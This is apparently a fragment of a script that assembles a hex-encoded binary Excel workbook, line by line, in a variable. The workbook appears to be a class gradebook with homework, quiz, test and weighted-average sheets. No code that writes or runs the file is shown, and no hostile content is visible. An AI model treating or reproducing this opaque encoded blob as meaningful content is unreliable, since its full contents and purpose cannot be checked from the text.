wD+="05c291e04220007001d0000222422232c2323302e30305f293b5c28222422232c2323302e30"
wD+="305c291e0427000800220000222422232c2323302e30305f293b5b5265645d5c28222422232"
wD+="c2323302e30305c291e0437002a003200005f282224222a20232c2323305f293b5f28222422"
wD+="2a205c28232c2323305c293b5f282224222a20222d225f293b5f28405f291e042e002900290"
wD+="0005f282a20232c2323305f293b5f282a205c28232c2323305c293b5f282a20222d225f293b"
wD+="5f28405f291e043f002c003a00005f282224222a20232c2323302e30305f293b5f282224222"
wD+="a205c28232c2323302e30305c293b5f282224222a20222d223f3f5f293b5f28405f291e0436"
wD+="002b003100005f282a20232c2323302e30305f293b5f282a205c28232c2323302e30305c293"
wD+="b5f282a20222d223f3f5f293b5f28405f291e040b00a400060000302e303030301e040a00a5"
wD+="00050000302e3030301e040800a600030000302e30e000140000000000f5ff2000000000000"
wD+="00000000000c020e000140001000000f5ff200000f40000000000000000c020e00014000100"
wD+="0000f5ff200000f40000000000000000c020e000140002000000f5ff200000f400000000000"
wD+="00000c020e000140002000000f5ff200000f40000000000000000c020e000140000000000f5"
wD+="ff200000f40000000000000000c020e000140000000000f5ff200000f40000000000000000c"
wD+="020e000140000000000f5ff200000f40000000000000000c020e000140000000000f5ff2000"
wD+="00f40000000000000000c020e000140000000000f5ff200000f40000000000000000c020e00"
wD+="0140000000000f5ff200000f40000000000000000c020e000140000000000f5ff200000f400"
wD+="00000000000000c020e000140000000000f5ff200000f40000000000000000c020e00014000"
wD+="0000000f5ff200000f40000000000000000c020e000140000000000f5ff200000f400000000"
wD+="00000000c020e0001400000000000100200000000000000000000000c020e000140001002b0"
wD+="0f5ff200000f80000000000000000c020e000140001002900f5ff200000f800000000000000"
wD+="00c020e000140001002c00f5ff200000f80000000000000000c020e000140001002a00f5ff2"
wD+="00000f80000000000000000c020e000140007000000f4ff000000f40000000000000000c020"
wD+="e000140006000000f4ff000000f40000000000000000c020e000140001000900f5ff200000f"
wD+="80000000000000000c020e0001400000001000100200000040000000000000000c020e00014"
wD+="000000000001002000006011114020402000040d20e00014000000010001002000006411114"
wD+="020402000040d20e00014000000000001002000006011114020402000040f20e00014000000"
wD+="010001002000006411114020402000040f20e00014000f00000001002000006811114020402"
wD+="000041620e00014000f00010001002000006c11114020402000041620e00014000000000001"
wD+="00200000201111402040200000c020e00014000000000001002000006011114020402000041"
wD+="620e00014001400000001002000006811114020402000040a20e00014000f00000001002000"
wD+="00080000000000000000c0eeee001400130000000100200000080000000000000000c020e00"
wD+="01400000000000000200000e011114020402000040f20e0001400000000000000200000e011"
wD+="114020402000040d20e0001400000000000000200000800000000000000000c020e00014000"
wD+="00001000000200000840000000000000000c020e0001400140001000000200000ec11114020"
wD+="402000040a2093020400108003ff93020400118006ff93020400128004ff93020400138007f"
wD+="f93020400148009ff93020400158008ff93020400008000ff93020400168005ff6001020000"
wD+="0085000b00c710000000000300616c6c85000a003a22000000000200637785000a00893f000"
wD+="000000200687785000c0010580000000004007175697a85000c006764000000000400746573"
wD+="7485000c00ac6f00000000040073746174850011001e80000000000900646576696174696f6"
wD+="e8500110029830000000009006176672067726170688c00040001000100ae01040008000104"
wD+="170020000500000001000100000002000200000003000300000004000400000000000000180"
wD+="01b00210000010b000000010000000000000d3b040001001f000100010018001b0021000001"
wD+="0b000000020000000000000d3b000001001f000100010018001b00210000010b00000003000"
wD+="0000000000d3b010001001f000100010018001b00210000010b000000040000000000000d3b"
wD+="020001001f000100010018001b00210000010b000000050000000000000d3b030001001f000"
wD+="1000100c1010800c1010000548d0100eb0082000f0000f07a000000000006f040000000011c"
wD+="000007000000180000000600000002000000050000000300000004000000040000000300000"
wD+="00500000002000000010000000b000000060000000600000033000bf012000000bf00080008"
wD+="00810141000008c0014000000840001ef1100000000b0000080c00000817000008f7000010f"
wD+="c002f059d010000660000000400005441534b08000043415445474f52590500004752414445"
wD+="160000312f32392c20333020502e203439322c2050203530320d0000382e3620382e3720736"
wD+="86565741f0000312f3330205175697a2032206f6e20726174657320616e6420726174696f73"
wD+="130000312f333120322f312043682054657374204120120000322f312c3220702e203531362"
wD+="02d203531381400006368203720616e642037206e746220636865636b080000686f6d65776f"
wD+="726b090000636c617373776f726b0400007175697a0400007465737418000073696d696c617"
wD+="220747269616e676c6573207061636b65740900006368203820746573740f000070726f6a65"
wD+="6374206f75746c696e650c0000636f6f6c20646f776e20233511000070726f6772657373207"
wD+="3686565742023371000007765656b6c79207265766965772031351000007765656b6c792072"
wD+="6576696577203136110000547269676f6e6f6d657472792054657374140000322f362c20372"
wD+="0702e203739392023312d323520100000702e203533312035333820322f382c39170000392e"
wD+="3320392e34207079746861676f7265616e2074686d1000007765656b6c79207265766965772"
wD+="031340d000054726967205477697374657220130000322f32372c3238204d61746820412074"
wD+="657374150000332f312c3220776b7368742031302e312f31302e361000007765656b6c79207"
wD+="26576696577203137140000547269676f6e6f6d657472792050726f6a6563740c00006c6f63"
wD+="7573207061636b65740b0000436972636c65207175697a1f0000332f372c382031312e31206"
wD+="e6f74657320616e6420707261632041207368740d000050415254494349504154494f4e0d00"
wD+="0070617274696369706174696f6e0900007761726d75702023350d000050617274696369706"
wD+="174696f6e090000436c617373776f726b080000486f6d65776f726b0500005175697a200400"
wD+="00546573740d000046696e616c20617665726167650600006f7574206f66060000677261706"
wD+="820050000477261646508000053747564656e74731900004879706f746865746963616c2063"
wD+="6c617373206772616465730400006d65616e0700006d656469616e200400006d6f646506000"
wD+="06d656469616e08000057656967687465640800004176657261676573080000526567756c61"
wD+="722008000043617465676f72790400005175697a160000496e73657274207175697a2067726"
wD+="170682068657265160000496e73657274207465737420677261706820686572650500005465"
wD+="7374200d00003f20496e73657274206865726504000050757420050000796f7572200300006"
wD+="f662009000063617465676f7279200800006176657261676573050000686572652004000028"
wD+="6e6f74090000776569676874656420080000617665726167652908000063772067726164650"
wD+="a000046696e616c204176672e0400004d65616e08000056617269616e636508000053742e20"
wD+="4465762e0700005a2d53636f72650600004d656469616e03000056617205000053744465760"
wD+="600005a73636f72650300004d656405000074686973200500007061737465040000616c6c20"
wD+="060000677261646573040000686572650500006a757374200700006e756d626572730700006"
wD+="66967757265200400006f757420040000686f7720030000746f20040000736f727406000073"
wD+="742064657608000076617269616e63650700007a2d73636f726505000070616765200500007"
wD+="7696c6c20070000616e7377657220020000612007000070726f6a6563740c00007072657365"
wD+="6e746174696f6e0800007175657374696f6eff006a000800150b00000c000000a50b00009c0"
wD+="000001a0c000011010000bb0c0000b2010000530d00004a020000d00d0000c70200002f0e00"
wD+="00260300007c0e000073030000e70e0000de030000370f00002e0400007d0f000074040000c"
wD+="00f0000b704000001100000f804000063081500630800000000000000000000150000000002"
wD+="0000d20a0000000908100000061000e228cd07c9c00000060200000b0214000000000000000"
wD+="0002000000095110000021c00000d00020001000c00020064000f0002000100110002000000"
wD+="10000800fca9f1d24d62503f5f00020001002a00020000002b0002000000820002000100800"
wD+="008000000000000000000250204000000ff0081000200c10414000000150000008300020000"
wD+="00840002000000a10022000000ff00010001000100040000000000000000000000e03f00000"
wD+="0000000e03f0000120002000100dd00020001006300020001005500020008007d000c000000"
wD+="0000db1f0f00020004007d000c0001000100b60d0f00020004007d000c000300030049030f0"
wD+="0020004007d000c0004000400b60d0f00060004009d000200010000020e0000000000200000"
wD+="0000000900000008021000000000000900ff000000000000010f0008021000010000000900f"
wD+="f000000000000010f0008021000020000000900ff000000000000010f000802100003000000"
wD+="0900ff000000000000010f0008021000040000000900ff000000000000010f0008021000050"
wD+="000000900ff000000000000010f0008021000060000000900ff000000000000010f00080210"
wD+="00070000000900ff000000000000010f0008021000080000000900ff000000000000010f000"
wD+="8021000090000000900ff000000000000010f00080210000a0000000900ff00000000000001"
wD+="0f00080210000b0000000900ff000000000000010f00080210000c0000000900ff000000000"
wD+="000010f00080210000d0000000900ff000000000000010f00080210000e0000000900ff0000"
wD+="00000000010f00080210000f0000000900ff000000000000010f0008021000100000000900f"
wD+="f000000000000010f0008021000110000000900ff000000000000010f000802100012000000"
wD+="0900ff000000000000010f0008021000130000000900ff000000000000010f0008021000140"
wD+="000000900ff000000000000010f0008021000150000000900ff000000000000010f00080210"
wD+="00160000000900ff000000000000010f0008021000170000000900ff000000000000010f000"
wD+="8021000180000000900ff000000000000010f0008021000190000000900ff00000000000001"
wD+="0f00080210001a0000000900ff000000000000010f00080210001b0000000900ff000000000"
wD+="000010f00080210001c0000000900ff000000000000010f00080210001d0000000900ff0000"
wD+="00000000010f00080210001e0000000900ff000000000000010f00080210001f0000000900f"
wD+="f000000000000010f00fd000a00000004001a0033000000fd000a00000005001a0034000000"
wD+="fd000a00010000000f0000000000fd000a00010001000f0001000000fd000a00010002000f0"
wD+="002000000fd000a00010004001a0024000000fd000a00010005001a0025000000fd000a0001"
wD+="0006001a0026000000fd000a00010007001a0027000000fd000a00010008001a0028000000f"
wD+="d000a00020000000f0021000000fd000a00020001000f00220000007e020a00020002000f00"
wD+="000059400600290002000400230000000000000024400000020007ff130024020002c042010"
wD+="5001f9a9999999999b93f05bd001200020005001b00000028401b0000003440060006003800"
wD+="020007001b000000000000002b400000020008ff220024050002c024090002c0240b0002c02"
wD+="41d0002c0420405001f9a9999999999c93f0506003d00020008001b006766666666662c4000"
wD+="00070004ff270024080002c0240a0002c024110002c0241a0002c0241b0002c0420505001f9"
wD+="a9999999999c93f05fd000a00030000000f0003000000fd000a00030001000f00090000007e"
wD+="020a00030002000f0000005940fd000a00040000000f0004000000fd000a00040001000f000"
wD+="a0000007e020a00040002000f0000005940fd000a00050000000f0005000000fd000a000500"
wD+="01000f000b0000007e020a00050002000f0000004940fd000a00060000000f0006000000fd0"
wD+="00a00060001000f00090000007e020a00060002000f0000c05040fd000a00060004001c0029"
wD+="000000fd000a00070000000f0007000000fd000a00070001000f00090000007e020a0007000"
wD+="2000f000000444006003300070004001d00cdcccccccc6c51400000580337fd1d0044020004"
wD+="c044020005c00344020006c00344020007c00344020008c003fd000a00080000000f0008000"
wD+="000fd000a00080001000f000c0000007e020a00080002000f0000004940fd000a0009000000"
wD+="0f000d000000fd000a00090001000f000b0000007e020a00090002000f0000005440fd000a0"
wD+="00a0000000f000e000000fd000a000a0001000f000c0000007e020a000a0002000f00008051"
wD+="40fd000a000b0000000f0011000000fd000a000b0001000f000b0000007e020a000b0002000"
wD+="f0000005940fd000a000c0000000f000f000000fd000a000c0001000f00090000007e020a00"
wD+="0c0002000f0000005940fd000a000d0000000f0023000000fd000a000d0001000f000a00000"
wD+="07e020a000d0002000f0000003440fd000a000e0000000f0010000000fd000a000e0001000f"
wD+="000a0000007e020a000e0002000f0000004940fd000a000f0000000f0012000000fd000a000"
wD+="f0001000f000a0000007e020a000f0002000f0000004940fd000a000f000400180035000000"
wD+="fd000a000f000500180036000000fd000a000f000600180034000000fd000a00100000000f0"
wD+="013000000fd000a00100001000f000a0000007e020a00100002000f0000003440fd000a0010"
wD+="000400180024000000fd000a0010000500180025000000fd000a0010000600180026000000f"
wD+="d000a0010000700180037000000fd000a0010000800180028000000fd000a00110000000f00"
wD+="14000000fd000a00110001000f000c0000007e020a00110002000f0000c0524006001f00110"
wD+="00400240000000000000059400000020004ff090024020002c042010500bd00120011000500"
wD+="190000004f40190000005140060006002e001100070019000000000000e050400000110004f"
wD+="f180024050002c024090002c0240b0002c0241d0002c0420405000600330011000800180000"
wD+="00000000c051400000110007fe1d0024080002c0240a0002c024110002c0241a0002c0241b0"
wD+="002c042050500fd000a00120000000f0015000000fd000a00120001000f00090000007e020a"
wD+="00120002000f0000005940fd000a00130000000f0016000000fd000a00130001000f0009000"
wD+="0007e020a00130002000f0000000000fd000a00140000000f0017000000fd000a0014000100"
wD+="0f00090000007e020a00140002000f0000000000fd000a00150000000f0018000000fd000a0"
wD+="0150001000f000a0000007e020a00150002000f0000005940fd000a00160000000f00190000"
wD+="00fd000a00160001000f000a0000007e020a00160002000f0000005440fd000a00170000000"
wD+="f001a000000fd000a00170001000f00090000007e020a00170002000f0000005940fd000a00"
wD+="180000000f001b000000fd000a00180001000f00090000007e020a00180002000f000000000"
wD+="0fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a00190002000f"
wD+="0000000000fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e020a001"
wD+="a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c000000"
wD+="7e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c0001000f0"
wD+="0090000007e020a001c0002000f0000005940fd000a001d0000000f001f000000fd000a001d"
wD+="0001000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f0020000000f"
wD+="d000a001e0001000f00090000007e020a001e0002000f0000005940fd000a001f0000000f00"
wD+="1e000000fd000a001f0001000f000a0000007e020a001f0002000f0000805640d70044000f0"
wD+="a00006c021c007000ea002a002a002a00380061002a002a002a002a002a002a002a00540070"
wD+="00cc002a002a002a002a002a002a002a002a002a002a002a002a002a00c20118000e0007000"
wD+="6000904040000801100110001000907080007feec00aa000f0002f038030000100008f00800"
wD+="0000060000000a1400000f0003f0f80200000f0004f028000000010009f0100000000000000"
wD+="000000000000000000000000002000af00800000000140000050000000f0004f05200000092"
wD+="0c0af00800000001140000000a000043000bf0180000007f0004010401bf0008000800ff010"
wD+="0000800bf0300000200000010f0120000000100010000000100000002000000020000000000"
wD+="11f0000000005d0046001500120014000100012100000000dc089201000000000c001400000"
wD+="0000000000000000001000b000000100000001300ee1f00000b000400010300000200140057"
wD+="0000000000ec0078000f0004f078000000f2030af00800000004140000000a000093000bf03"
wD+="60000008000503236018500010000008b0002000000bf0008000a0047014f05000048012660"
wD+="0000810141000008c001400000087f0300000c00000010f0120000000000000077000200d30"
wD+="0000008030c00f100000011f0000000005d001a00150012001e000400116050323601a80992"
wD+="010000000000000000ec00080000000df000000000b60112001202000000000000000068001"
wD+="000000000003c00690000456e74657220796f7572206e6577207461736b7320686572652e20"
wD+="20596f75206d617920757365207468697320736865657420746f2068656c7020796f752e202"
wD+="04f70656e207468697320646f63756d656e7420616e64206368616e67652074686520696e66"
wD+="6f2e3c001000000000006c0211006800000000000000ec0078000f0004f078000000e2030af"
wD+="00800000005140000000a000093000bf0360000008000a03236018500010000008b00020000"
wD+="00bf0008000a00470155b5ffff480119d5ffff810141000008c001400000087f0300000c000"
wD+="00010f01200000000000600d001040088000800e00008000000000011f0000000005d001a00"
wD+="150012001e0005001160a0323601e40a92010000000000000000ec00080000000df00000000"
wD+="0b60112001202000000000000000029001000000000003c002a0000436c69636b2074686520"
wD+="63656c6c20616e6420636865636b206f75742074686520666f726d756c612e3c00100000000"
wD+="000e90011002900000000000000ec006c000f0004f06c000000c2000af00800000006140000"
wD+="000a000073000bf02a0000008000f03236018500010000008b0002000000bf0008000a00810"
wD+="10d000008bf0110001000c00140000008000010f012000000000004008b001300d3000800b0"
wD+="0120005a00000011f0000000005d001a00150012001e0006001160f0323601d80b920100000"
wD+="00000000000ec00080000000df000000000b6011200120200000000000000003e0010000000"
wD+="00003c003f0000496e7365727420746865206772617068206f6620746869732064617461206"
wD+="f6e2061206e65772073686565742e202053656520646972656374696f6e732e3c0010000000"
wD+="00005d0111003e00000000000000ec00fa000f0004f0f200000002000af0080000000a14000"
wD+="0000a0000b3000bf0b8000000bf000800080042011e01000043013a00000044010400000045"
wD+="c14c00000046c1240000007f0101000100810141000008bf0100001000c00140000008ff011"
wD+="000100013001300f0ff000000000c001a00180034002d003500420036006e000b007c000700"
wD+="8a0003007a001f0080001f0086001f008f0002009e000600ad000a00c6003a00db003a00f00"
wD+="03a0014010e001e0106000f0010000200004000ad012000ad012000ad012000ad012000ad01"
wD+="2000ad012000ac0080000010f012000000000004000b0012005a00080050031500c40000001"
wD+="1f0000000005d001a00150012001e000a00116000000000bc0c92010000000000000000ec00"
wD+="28002f0005f020000000000017f0080000000200000004140000000017f0080000000400000"
wD+="0051400003e021200b606000000004000000000000000000000001d000f0003020004000000"
wD+="0100020002000404ef00060005003700000067081700670800000000000000000000020001f"
wD+="fffffff004000000a0000000908100000061000e228cd07c9c00000060200000b0218000000"
wD+="000001000000290000000c230000cb2f00002f3000000d00020001000c00020064000f00020"
wD+="0010011000200000010000800fca9f1d24d62503f5f00020001002a00020000002b00020000"
wD+="00820002000100800008000000000000000000250204000000ff0081000200c104140000001"
wD+="5000000830002000000840002000000a10022000000ff000100010001000400020001ff0000"
wD+="00000000e03f000000000000e03f0400120002000100dd00020001006300020001005500020"
wD+="008007d000c0000000000b6170f00020004007d000c0001000100920f0f00020004007d000c"
wD+="0008000800db0b0f00060004007d000c000d000d00b60a0f00060004009b0000009d0002000"
wD+="1009e00220000000400060218433601090100000000000000000000000000636c617373776f"
wD+="726b00020e00010000002900000000000e00000008021000010000000a00ff0000000000000"
wD+="10f0008021000020000000a00ff000000000020010f0008021000030000000a00ff00000000"
wD+="0020010f0008021000040000000a00ff000000000000010f0008021000050000000a00ff000"
wD+="000000020010f0008021000060000000a00ff000000000020010f0008021000070000000a00"
wD+="ff000000000020010f0008021000080000000a00ff000000000020010f00080210000900000"
wD+="00a00ff000000000020010f00080210000a0000000a00ff000000000020010f00080210000b"
wD+="0000000a00ff000000000020010f00080210000c0000000a00ff000000000020010f0008021"
wD+="0000d0000000a00ff000000000000010f00080210000e0000000a00ff000000000000010f00"
wD+="080210000f0000000a00ff000000000000010f0008021000100000000800ff0000000000000"
wD+="10f0008021000110000000800ff000000000020010f0008021000120000000800ff00000000"
wD+="0020010f0008021000130000000800ff000000000020010f0008021000140000000800ff000"
wD+="000000020010f0008021000150000000800ff000000000000010f0008021000160000000800"
wD+="ff000000000000010f0008021000170000000800ff000000000020010f00080210001800000"
wD+="00800ff000000000020010f0008021000190000000800ff000000000000010f00080210001a"
wD+="0000000800ff000000000020010f00080210001b0000000800ff000000000020010f0008021"
wD+="0001c0000000800ff000000000020010f00080210001d0000000800ff000000000020010f00"
wD+="080210001e0000000800ff000000000020010f00080210001f0000000800ff0000000000000"
wD+="10f00fd000a00010000000f0000000000fd000a00010001000f0001000000fd000a00010002"
wD+="000f0002000000fd000a00010003000f004b000000fd000a00010004000f0047000000fd000"
wD+="a00010005000f0048000000fd000a00010006000f0049000000fd000a00010007000f004a00"
wD+="0000fd000a00010008000f0029000000fd000a00020000000f0021000000fd000a000200010"
wD+="00f00220000007e020a00020002000f000000594003020e0002000800170014b742712b1451"
wD+="4003020e0002000900170014b742712b145140fd000a00030000000f0003000000fd000a000"
wD+="30001000f00090000007e020a00030002000f0000005940fd000a00030008000f0029000000"
wD+="fd000a00030009000f0029000000fd000a00040000000f0004000000fd000a00040001000f0"
wD+="00a0000007e020a0004000200250000004b40060047000400030025000000000000004b4020"
wD+="001f0007fe310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02"
wD+="4160002c024190002c0241f0002c04209e300060047000400040026009ff4499ff4494c4020"
wD+="00040006ff310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02"
wD+="4160002c024190002c0241f0002c04209050006004700040005002500f46ae259d16c954020"
wD+="000f0008ff310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02"
wD+="4160002c024190002c0241f0002c042092e000600470004000600250055db59c2cf83424020"
wD+="00040007ff310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02"
wD+="4160002c024190002c0241f0002c042090c000600280004000700250047c9462533d2b1bf20"
wD+="00040005ff120044040002c044040004c0041544040006c0067e020a0004000800170000805"
wD+="14001020600040009001700fd000a00050000000f0005000000fd000a00050001000f000b00"
wD+="00007e020a00050002000f0000004940fd000a00060000000f0006000000fd000a000600010"
wD+="00f00090000007e020a00060002000f0000c05040fd000a00070000000f0007000000fd000a"
wD+="00070001000f00090000007e020a00070002000f0000004440fd000a00080000000f0008000"
wD+="000fd000a00080001000f000c0000007e020a00080002000f0000004940fd000a0009000000"
wD+="0f000d000000fd000a00090001000f000b0000007e020a00090002000f0000005440fd000a0"
wD+="00a0000000f000e000000fd000a000a0001000f000c0000007e020a000a0002000f00008051"
wD+="40fd000a000b0000000f0011000000fd000a000b0001000f000b0000007e020a000b0002000"
wD+="f0000005940fd000a000c0000000f000f000000fd000a000c0001000f00090000007e020a00"
wD+="0c0002000f0000005940fd000a000d0000000f0023000000fd000a000d0001000f000a00000"
wD+="07e020a000d0002000f00000034407e020a000d0004000f0000004f4003020e000d0006000f"
wD+="0043e7357689da4340060028000d0007000f00410b953b80ecf0bf0000040004ff1200440d0"
wD+="002c0440d0004c00415440d0006c006fd000a000e0000000f0010000000fd000a000e000100"
wD+="0f000a0000007e020a000e0002000f00000049407e020a000e0004000f0000004f4003020e0"
wD+="00e0006000f0043e7357689da4340060028000e0007000f00937af3fa6d57d3bf00000d0007"
wD+="ff1200440e0002c0440e0004c00415440e0006c006fd000a000e0008001e0045000000fd000"
wD+="a000e0009001e002a000000fd000a000f0000000f0012000000fd000a000f0001000f000a00"
wD+="00007e020a000f0002000f000198c2407e020a000f0004000f0000004f4003020e000f00060"
wD+="00f0043e7357689da4340060028000f0007000f00f7cfd0457ac1ea3f00000e0007ff120044"
wD+="0f0002c0440f0004c00415440f0006c006060023000f0008001b00cdcccccccccc284000003"
wD+="00637fd0d001fd7a3703d0ad7e33f1e1400057e020a000f0009001f0000003440fd000a0010"
wD+="0000000f0013000000fd000a00100001000f000a0000007e020a00100002000f00000034407"
wD+="e020a00100004000f0000004f4003020e00100006000f0043e7357689da4340060028001000"
wD+="07000f00410b953b80ecf0bf00000f0007ff120044100002c044100004c0041544100006c00"
wD+="6fd000a00110000000f0014000000fd000a00110001000f000c0000007e020a00110002000f"
wD+="0000c05240fd000a00120000000f0015000000fd000a00120001000f00090000007e020a001"
wD+="20002000f0000005940fd000a00130000000f0016000000fd000a00130001000f0009000000"
wD+="7e020a00130002000f0000000000fd000a00140000000f0017000000fd000a00140001000f0"
wD+="0090000007e020a00140002000f0000000000fd000a00150000000f0018000000fd000a0015"
wD+="0001000f000a0000007e020a00150002000f00000059407e020a00150004000f0000004f400"
wD+="3020e00150006000f0043e7357689da434006002800150007000f0014820178c39fee3f0000"
wD+="100007ff120044150002c044150004c0041544150006c006fd000a00160000000f001900000"
wD+="0fd000a00160001000f000a0000007e020a00160002000f00000054407e020a00160004000f"
wD+="0000004f4003020e00160006000f0043e7357689da434006002800160007000f00dd376df82"
wD+="403dd3f0000150007ff120044160002c044160004c0041544160006c006fd000a0017000000"
wD+="0f001a000000fd000a00170001000f00090000007e020a00170002000f0000005940fd000a0"
wD+="0180000000f001b000000fd000a00180001000f00090000007e020a00180002000f00000000"
wD+="00fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a00190002000"
wD+="f00000000007e020a00190004000f0000004f4003020e00190006000f0043e7357689da4340"
wD+="06002800190007000f00537e7ab998fbf8bf0000160007ff120044190002c044190004c0041"
wD+="544190006c006fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e020a"
wD+="001a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c000"
wD+="0007e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c000100"
wD+="0f00090000007e020a001c0002000f0000005940fd000a001d0000000f001f000000fd000a0"
wD+="01d0001000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f00200000"
wD+="00fd000a001e0001000f00090000007e020a001e0002000f0000005940fd000a001f0000000"
wD+="f001e000000fd000a001f0001000f000a0000007e020a001f0002000f00008056407e020a00"
wD+="1f0004000f0000004f4003020e001f0006000f0043e7357689da4340060028001f0007000f0"
wD+="0010f1cfaaa90e63f0000190007ff1200441f0002c0441f0004c00415441f0006c006d70042"
wD+="00370c000058027e004e0046009a012a002a002a002a002a002a002a002a0076009200ab007"
wD+="6002a002a002a002a00760076002a002a0076002a002a002a002a002a000802100028000d00"
wD+="0e00ff000000000000010f000102060028000d001700d70006001e0000000000c20118001f0"
wD+="00400020009070300010f08000f0005000903080007ffec00aa000f0002f03e020000200008"
wD+="f00800000005000000040400000f0003f00e0200000f0004f028000000010009f0100000000"
wD+="000000000000000000000000000000002000af00800000000040000050000000f0004f05200"
wD+="0000920c0af00800000001040000000a000043000bf0180000007f0004010401bf000800080"
wD+="0ff0100000800bf0300000200000010f0120000000100010000000100000002000000020000"
wD+="00000011f0000000005d00460015001200140001000121000000006c129201000000000c001"
wD+="40000000000000000000000010008000000100000001300ee1f000008000400010300000a00"
wD+="1400570000000000ec0072000f0004f06a000000920c0af00800000002040000000a0000830"
wD+="00bf0300000007f0004010401bf000800080081014e00000883014d000008bf0110001000c0"
wD+="014d000008ff01080008003f0200000200000010f012000000000000004101210000000c00a"
wD+="0023700d300000011f0000000005d001a001500120005000200116000000000381392010000"
wD+="0000000000000908100000062000e228cd07c9c000000602000014000000150000008300020"
wD+="000008400020000004d006a0300004500700073006f006e0020005300740079006c00750073"
wD+="00200043004f004c004f005200200036003000300020004500530043002f005000200032000"
wD+="000000001040005dc008c0243ef800702000100ea0a6f08640001000f006801020001006801"
wD+="020001004c00650074007400650072000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000100000000000000020000000200000001000000300100000000000000000"
wD+="000000000000000000044494e55220000003402580053ab1e3f000000000000000000000000"
wD+="010000000000000000000000000000000800000001000000010000000000020000000400000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000dddd00000000000000000000000000000000000000000000000000000"
wD+="0000000000000000000000580000004f5350454141828202000000000000000100000000000"
wD+="000000000000000000000000000010000000000000004000000000000000000000000000000"
wD+="000000006a0000000000000003000000010000000f000000a10022000100640001000100010"
wD+="0000068016801000000000000e03f000000000000e03f010033000200030060100a00802535"
wD+="16dc000100090060100a008115e60ac80000000a0060100a008115e60ac80001000b0012000"
wD+="2000100011002000000021010000000000000000000d0bfb502e8bf230133100000a0000400"
wD+="0100010064100800000001000000010032100400000002003310000007100c0000000000000"
wD+="0ffff09004d000a101000ffffff0000000000010001004e004d003410000003100c00030001"
wD+="000c000900010000003310000051100f0000020000000007003a0000010002000d100e00000"
wD+="0050147005200410044004500511013000102000000000b003b000002001f00020002005110"
wD+="13000202000000000b003b000002001f000000010051100800030100000000000006100800f"
wD+="fff000000000000331000005f10020000003410000045100200000034100000441004000a00"
wD+="0000241002000200251020000202010000000000eaffffffcbffffff0000000000000000b10"
wD+="04d00103d0000331000004f1014000200020000000000000000000000000000000000261002"
wD+="000a0051100800000100000000000034100000241002000300251020000202010000000000e"
wD+="affffffcbffffff0000000000000000b1004d00103d0000331000004f101400020002000000"
wD+="0000000000000000000000000000261002000b0051100800000100000000000034100000461"
wD+="00200010041101200000062010000e0030000820b000005060000331000004f101400020002"
wD+="002c000000ed020000b90c0000490c00001d101200000000000000000000000000000000000"
wD+="000331000002010080001aaaaaa010001006210120000000000010000000100000000000000"
wD+="ef001e101e000200030100000000000000000000000000000000000000000b004d005a00261"
wD+="002000900341000001d101200010000000000000000000000000000000000331000001f102a"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="00000001f011e101e0002000301000000000000000000000000000000000000000023004d00"
wD+="000021100200010007100c00000000000000ffff09004d00341000003510000032100400000"
wD+="003003310000007100c008080800000000000000017000a101000c0c0c00000000000010000"
wD+="0016004f0034100000141014000000000000000000000000000000000000000000331000001"
wD+="8100200010022100a0000000000000000000f0015101400150d00001a0600007a0200009101"
wD+="000003011f00331000004f10140005000200150d00001a06000000000000000000002510200"
wD+="00202010000000000eaffffffcbffffff0000000000000000b1004d0030090000331000004f"
wD+="101400020002000000000000000000000000000000000051100800000100000000000034100"
wD+="000341000003410000034100000251020000202010000000000a9060000540000004a020000"
wD+="e501000081004d0080300000331000004f101400020002000000000000000000860000002e0"
wD+="00000261002000a005110080000010000000000000d10180000000a0143006c006100730073"
wD+="0077006f0072006b00200027100600010000000000341000003410000000020e00000000000"
wD+="90000000000010000006510020002000402370000000000000017000163006c006100730073"
wD+="0077006f0072006b000a0038002e003600200038002e0037002000730068006500650074000"
wD+="4022f0001000000000013000163006c0061007300730077006f0072006b000a007700610072"
wD+="006d00750070002000230035000402350002000000000016000163006c00610073007300770"
wD+="06f0072006b000a0063006f006f006c00200064006f0077006e0020002300350004023d0003"
wD+="00000000001a000163006c0061007300730077006f0072006b000a007700650065006b006c0"
wD+="07900200072006500760069006500770020003100350004023d000400000000001a00016300"
wD+="6c0061007300730077006f0072006b000a007700650065006b006c007900200072006500760"
wD+="069006500770020003100360004023d000500000000001a000163006c006100730073007700"
wD+="6f0072006b000a007700650065006b006c00790020007200650076006900650077002000310"
wD+="034000402370006000000000017000163006c0061007300730077006f0072006b000a005400"
wD+="72006900670020005400770069007300740065007200200004023d000700000000001a00016"
wD+="3006c0061007300730077006f0072006b000a007700650065006b006c007900200072006500"
wD+="76006900650077002000310037000402350008000000000016000163006c006100730073007"
wD+="7006f0072006b000a006c006f0063007500730020007000610063006b006500740065100200"
wD+="010003020e000000000000000000000000004b4003020e00010000000000000000000000344"
wD+="003020e00020000000000000000000000494003020e00030000000000cdcccccccccc574003"
wD+="020e00040000000000000000000000344003020e00050000000000000000000000594003020"
